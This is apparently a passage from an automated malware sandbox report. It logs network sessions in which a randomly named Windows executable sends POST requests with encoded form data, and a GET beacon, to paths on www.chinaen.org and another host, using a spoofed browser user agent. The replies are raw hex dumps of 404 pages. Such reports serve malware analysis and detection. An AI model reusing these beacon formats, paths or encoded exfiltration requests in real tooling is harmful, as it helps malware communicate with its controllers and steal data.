                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fab57d3b7ce8-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 61 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 [TRUNCATED]
                                                        Data Ascii: a52YySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q"
                                                        Sep 18, 2024 16:20:54.781241894 CEST1236INData Raw: 29 e3 85 34 49 5e ca 89 c4 89 d2 15 3b 7e ec f8 b1 88 82 33 40 56 a1 65 45 05 4a 0c 1e 57 0d d5 7d 7c 3d 43 ac 23 53 88 45 2c 03 ea 5c 98 f7 c0 b1 88 c4 ff 15 9c f1 e4 f2 67 35 23 d7 c3 b9 0e 92 07 7c 82 38 b9 e0 d1 d4 10 a9 24 49 fc de 86 08 ac
                                                        Data Ascii: )4I^;~3@VeEJW}|=C#SE,\g5#|8$IEB,a4$$T4JAEyIOXa&%oCf@Jm'g)Vx?Pg`AL.+<Z]G$*<UAR$fW0|,R-6eC<v'%$
                                                        Sep 18, 2024 16:20:54.781275034 CEST870INData Raw: f1 81 3d f5 ab bb f9 ab bb f6 c0 1e d8 2e 6e 8d f3 a1 91 21 67 7d c1 dd 9e 64 53 6b bc 39 3c ca b6 7e 2c e4 73 f6 74 d6 59 ef 77 d6 af db 4b 37 dc d5 49 be ce 5e a7 f8 37 02 df 13 87 44 db 60 8e 0d 2f 3b c3 0b 6c 61 c4 be d9 6b f7 0c fb 29 78 67
                                                        Data Ascii: =.n!g}dSk9<~,stYwK7I^7D`/;lak)xg=TzYxioKk<{$dZ"TQ{=dB$&K'lg~+si5ZJ]p~{dd+`;/"sB2q2EAKc/RD1pt").PU+
                                                        Sep 18, 2024 16:20:54.781727076 CEST22INData Raw: 63 0d 0a e3 e5 02 00 6f 66 ff 91 97 1e 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: cof0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.553660188.114.97.3801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:56.120330095 CEST833OUTPOST /mquw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Origin: http://www.chinaen.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.chinaen.org/mquw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 76 77 42 65 7a 37 4f 76 48 6e 67 54 4b 50 68 4d 43 48 4a 46 53 41 73 4a 7a 75 2b 57 6b 37 41 61 58 62 64 78 6d 7a 66 6d 68 66 56 64 47 46 42 65 56 6e 49 41 39 46 75 74 53 57 56 34 39 63 4b 44 52 46 47 46 45 78 30 6f 6a 75 50 71 72 4b 49 78 67 4c 54 64 34 42 58 34 52 6b 42 37 34 2f 48 61 42 37 4a 51 6c 68 31 6a 74 71 49 6f 4e 69 4f 4a 69 31 59 42 68 45 42 74 6e 41 42 43 67 64 63 6a 4e 55 61 78 71 47 50 30 34 69 68 69 59 77 37 69 50 4c 2b 69 63 51 46 39 64 62 73 34 69 44 79 4e 33 38 65 34 75 55 6a 4e 72 49 4a 2f 34 33 66 44 37 45 59 79 73 71 42 77 44 67 6a 48 65 6b 4d 4b 53 5a 6c 70 41 33 6a 4c 66 4c 51 57 6e 6f 67
                                                        Data Ascii: x0wHoJ8X=wXJkDQSrfO98EvwBez7OvHngTKPhMCHJFSAsJzu+Wk7AaXbdxmzfmhfVdGFBeVnIA9FutSWV49cKDRFGFEx0ojuPqrKIxgLTd4BX4RkB74/HaB7JQlh1jtqIoNiOJi1YBhEBtnABCgdcjNUaxqGP04ihiYw7iPL+icQF9dbs4iDyN38e4uUjNrIJ/43fD7EYysqBwDgjHekMKSZlpA3jLfLQWnog
                                                        Sep 18, 2024 16:20:57.207595110 CEST1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:20:57 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4nQ9G1BVj%2FENK2m%2FRzcsPmQlAa%2F4wGZjK002PQG1nsH%2B8moXxoChhuMBSTWorppXAy55EdEpZoMtlEeEfBiX7EBP2%2B1g2eXQQzG0QpbK0USQsZrHem5JqRptTxLTNTQQ1U%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fac53eb9435d-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 61 35 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 [TRUNCATED]
                                                        Data Ascii: a5eYySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q")
                                                        Sep 18, 2024 16:20:57.207663059 CEST224INData Raw: 85 34 49 5e ca 89 c4 89 d2 15 3b 7e ec f8 b1 88 82 33 40 56 a1 65 45 05 4a 0c 1e 57 0d d5 7d 7c 3d 43 ac 23 53 88 45 2c 03 ea 5c 98 f7 c0 b1 88 c4 ff 15 9c f1 e4 f2 67 35 23 d7 c3 b9 0e 92 07 7c 82 38 b9 e0 d1 d4 10 a9 24 49 fc de 86 08 ac 1f 45
                                                        Data Ascii: 4I^;~3@VeEJW}|=C#SE,\g5#|8$IEB,a4$$T4JAEyIOXa&%oCf@Jm'g)Vx?Pg`AL.+<Z]G$*<UAR$fW0|,R-6eC
                                                        Sep 18, 2024 16:20:57.207693100 CEST1236INData Raw: 3c 80 76 27 1d eb bb b3 ee 25 17 9d 24 88 aa 92 ce c3 53 49 69 6d 78 42 4a 8b 01 9a 49 be 9b 76 c4 55 a8 9f 13 62 ce f8 7a 71 bc 8f 1b 55 b6 a0 56 bf 85 a0 29 a7 ca 06 24 88 a9 95 36 b7 d2 00 d0 10 4d 11 25 2a 24 79 aa 83 32 c5 44 3f d0 22 9f 87
                                                        Data Ascii: <v'%$SIimxBJIvUbzqUV)$6M%*$y2D?"iFvCFVV(ETQgO6={dJiJ^`*73PM`L9+2)$ H`$KK:3'P,]{+J\V3 flMINXU)mOr34i)3
                                                        Sep 18, 2024 16:20:57.207971096 CEST661INData Raw: 92 74 22 13 29 e0 93 2e 50 83 93 55 02 ca 2b bd ca ba 28 13 6d f7 b6 f6 ef e0 27 2a 49 9e fc e3 49 10 16 df 13 5b c1 27 69 ac 2a 20 fc 5e 6b cb 07 27 f6 47 73 a9 f4 44 0c c4 eb 94 3a 31 51 22 81 4c fe ee 25 56 11 c4 11 07 a7 78 41 f1 40 4b f8 52
                                                        Data Ascii: t").PU+(m'*II['i* ^k'GsD:1Q"L%VxA@KR"so7/UT IreATQ0mTWB^|PmTe&Fx|hN[hG;^oTNDA1GMb& zj%hI)WC"9T$OC5}]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.553661188.114.97.3801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:58.697415113 CEST1850OUTPOST /mquw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Origin: http://www.chinaen.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.chinaen.org/mquw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 76 77 42 65 7a 37 4f 76 48 6e 67 54 4b 50 68 4d 43 48 4a 46 53 41 73 4a 7a 75 2b 57 6b 7a 41 61 6c 54 64 78 42 6e 66 30 52 66 56 58 6d 46 41 65 56 6e 46 41 35 70 71 74 53 61 76 34 2f 6b 4b 52 44 68 47 43 31 78 30 2f 7a 75 50 6f 72 4b 4e 70 41 4c 38 64 34 52 62 34 51 59 42 37 34 2f 48 61 44 6a 4a 57 30 68 31 68 74 71 4c 74 4e 69 53 66 53 31 77 42 6c 67 37 74 6d 31 32 43 51 39 63 69 74 45 61 69 76 79 50 70 49 69 6e 76 34 77 6a 69 50 58 39 69 63 6c 36 39 5a 61 44 34 6c 76 79 50 57 35 4a 68 74 63 6c 66 64 4d 64 76 70 72 6f 65 74 55 6f 73 36 75 4a 38 77 78 42 4d 74 46 6a 47 33 6c 71 38 44 53 71 53 4f 7a 2b 66 7a 4a 71 59 4a 31 4d 2f 47 44 6b 6d 64 43 32 72 59 62 70 4e 74 75 4d 37 6d 68 2b 31 56 4a 68 73 47 49 68 52 4a 51 53 65 6c 4d 33 54 78 2b 63 2f 45 6c 4c 4e 76 4c 42 49 32 4d 53 6e 59 32 61 61 74 48 44 64 36 70 51 56 70 74 55 68 4f 36 33 7a 47 5a 2b 46 33 2b 6a 6b 61 41 6f 45 34 70 58 54 33 55 47 53 2b 61 49 6b 32 39 52 59 53 54 63 61 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=wXJkDQSrfO98EvwBez7OvHngTKPhMCHJFSAsJzu+WkzAalTdxBnf0RfVXmFAeVnFA5pqtSav4/kKRDhGC1x0/zuPorKNpAL8d4Rb4QYB74/HaDjJW0h1htqLtNiSfS1wBlg7tm12CQ9citEaivyPpIinv4wjiPX9icl69ZaD4lvyPW5JhtclfdMdvproetUos6uJ8wxBMtFjG3lq8DSqSOz+fzJqYJ1M/GDkmdC2rYbpNtuM7mh+1VJhsGIhRJQSelM3Tx+c/ElLNvLBI2MSnY2aatHDd6pQVptUhO63zGZ+F3+jkaAoE4pXT3UGS+aIk29RYSTcawOnzlCko1V7CEfIi54a45SDjCZsZ1usOggfdZX2Xeex/L4KXOhah0DFyKXS5PdS/3thjMXItIoXazt2G0SQnyQEfJ6Ch1cd5qUgk/Pg4htL9FRzZ21WqYTqo7TuwhUdZPxe6185EiYmtcyEB0B0D4Mx8X4j3T2LLqZ/3BkYhLcGshGEBMfIJbgFDwjwYYQe4OdHV7shH9L7ALW168tGdrIvziIkgSK/i0cdkDqRtSJU1MI61osl32Cz75jkjhyih2aAR/G14u8Oor147LVEjbbDg7OiL8ouUaKgG55+6mp86wSijJgKD044Ss/z3kSKLO6VH0kiIeXE+72l7dyiVrAlpegOA+zwamf9f+ljavUYpr3sni2laBV10b1SKvJoQ037Egh6o4DrkmvQmwxqqLeIIpNLZYHobRRtShnSUbrQ8iOTZQwN7GhcRCzlq0SFjC8rmJeOLWxDOTri2dfAp9b+9evk08Hxh5RPMQI8ju6PNUESF0kLAvD46KOQ/tSSLyswighBz/gcbOfHLZSJyt1lK0PGPxCVPvASs0yfpdQGfGm4CBoSq+f0M7eYCaktptKpGwviSekcdVPXV8IiiDK7dA6Xj7pvG36LLqa2c3JmIJhzaNQ6FS3OEzQ3tl4amYtwA9zMJQrAEERzGKYP1Gj984vTVnXdXgi [TRUNCATED]
                                                        Sep 18, 2024 16:20:59.707585096 CEST1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:20:59 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etHMhN214ihAwot1ehHbqV6GKyOUw1THI9%2BG9nPgSIz%2BduB%2FseIQSZLZXJeWFZH3XJ8Q0V7fGyO7RziAKO2sz%2FdPpOnnrtKwh9cimGs9dQqrhOXmuRNGgR9vgp07mwwHgZE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fad5597119b6-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 61 35 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 [TRUNCATED]
                                                        Data Ascii: a5eYySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q")4
                                                        Sep 18, 2024 16:20:59.707788944 CEST1236INData Raw: 49 5e ca 89 c4 89 d2 15 3b 7e ec f8 b1 88 82 33 40 56 a1 65 45 05 4a 0c 1e 57 0d d5 7d 7c 3d 43 ac 23 53 88 45 2c 03 ea 5c 98 f7 c0 b1 88 c4 ff 15 9c f1 e4 f2 67 35 23 d7 c3 b9 0e 92 07 7c 82 38 b9 e0 d1 d4 10 a9 24 49 fc de 86 08 ac 1f 45 42 2c
                                                        Data Ascii: I^;~3@VeEJW}|=C#SE,\g5#|8$IEB,a4$$T4JAEyIOXa&%oCf@Jm'g)Vx?Pg`AL.+<Z]G$*<UAR$fW0|,R-6eC<v'%$SIi
                                                        Sep 18, 2024 16:20:59.707825899 CEST883INData Raw: ab bb f9 ab bb f6 c0 1e d8 2e 6e 8d f3 a1 91 21 67 7d c1 dd 9e 64 53 6b bc 39 3c ca b6 7e 2c e4 73 f6 74 d6 59 ef 77 d6 af db 4b 37 dc d5 49 be ce 5e a7 f8 37 02 df 13 87 44 db 60 8e 0d 2f 3b c3 0b 6c 61 c4 be d9 6b f7 0c fb 29 78 67 e3 aa 3d b6
                                                        Data Ascii: .n!g}dSk9<~,stYwK7I^7D`/;lak)xg=TzYxioKk<{$dZ"TQ{=dB$&K'lg~+si5ZJ]p~{dd+`;/"sB2q2EAKc/RD1pt").PU+(m


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.553662188.114.97.3801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:01.251832962 CEST560OUTGET /mquw/?2VDlJ=Z2VdhTx&x0wHoJ8X=9VhEAk+nBcRFJItebzuYkEWcWYPrTgvEZy86ZzmkaEauDk+ByEDFhBf1SE1efnbmII1/0Q2I2f54RFseImhioiSeit22xDiqKKd7jVQmz4n0QSDnRFZQupGXvMbNczsPDQ== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:21:02.598659039 CEST1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:21:02 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYfRG4D1AXx1pQ8hcwLeUJhtixVuTUsut%2FfCYHLsG2pMLeVmDiFfMG9lKLwMZxcgVUWmWQAgZ4VK0V4BMxXlS28h1A%2F8w0pas86j%2BZJeRMO7CRY5575JOoodnOcxi9tx2ho%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fae56a0543b6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 31 65 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa [TRUNCATED]
                                                        Data Ascii: 1e97<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.
                                                        Sep 18, 2024 16:21:02.598691940 CEST1236INData Raw: 33 2e 33 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a
                                                        Data Ascii: 3.3.min.css" rel="stylesheet"><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css" /><link rel="stylesheet" type="text/css" href="http://www.chinaen.org/zb_users/theme/yd112
                                                        Sep 18, 2024 16:21:02.598705053 CEST1236INData Raw: 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 09 09 09 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e
                                                        Data Ascii: ></div><div class="login"><a rel="nofollow" href="http://www.chinaen.org/zb_system/login.php" target="_blank"></a></div><div class="search"><form name="search" method="get" action="http://www.chinaen.org/search.php?
                                                        Sep 18, 2024 16:21:02.599306107 CEST1236INData Raw: 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 22 3e e8 bf 94 e5 9b 9e e9 a6 96 e9 a1 b5 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 6d 61 69 6e 5f 73
                                                        Data Ascii: "></a></div></div></div></div>... main_side --><div class="main_side"> <div class="widget widget_previous"><div class="title"></div><ul><li><a hre
                                                        Sep 18, 2024 16:21:02.599319935 CEST1236INData Raw: 6e 20 63 6c 61 73 73 3d 22 64 61 74 65 74 69 6d 65 22 3e 20 28 30 38 2d 32 35 29 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 6c 69 3e 09 09 09 09 3c 6c 69 3e 0d 0a 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f
                                                        Data Ascii: n class="datetime"> (08-25)</span></span></li><li><a href="http://www.chinaen.org/lol/200.html" target="_blank" title="10v10 ">10v10 </a><span>3<span class="da
                                                        Sep 18, 2024 16:21:02.599927902 CEST1236INData Raw: 3d 22 5b e4 b8 80 e5 9b be e6 b5 81 5d e9 a3 8e e9 be 99 e5 a4 a7 e6 88 98 ef bc 8c e5 b0 8f e8 83 96 e5 ae ab e6 9c ac e8 bd ac e8 ba ab e6 8b bf e9 be 99 ef bc 8c e5 90 8e e7 bb ad e8 bf 9b e5 9c ba ef bc 8c e5 8f 96 e5 be 97 e4 b8 89 e6 9d 80
                                                        Data Ascii: ="[] ">[] </a><span>4<span class="datetime"> (08-2
                                                        Sep 18, 2024 16:21:02.599955082 CEST1091INData Raw: 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 75 70 22 3e 3c 2f 69 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31
                                                        Data Ascii: ="fa fa-angle-up"></i></div><script src="http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4" type="text/javascript"></script><script src="http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4" type=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.55366313.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:21:07.916275024 CEST837OUTPOST /f1gw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
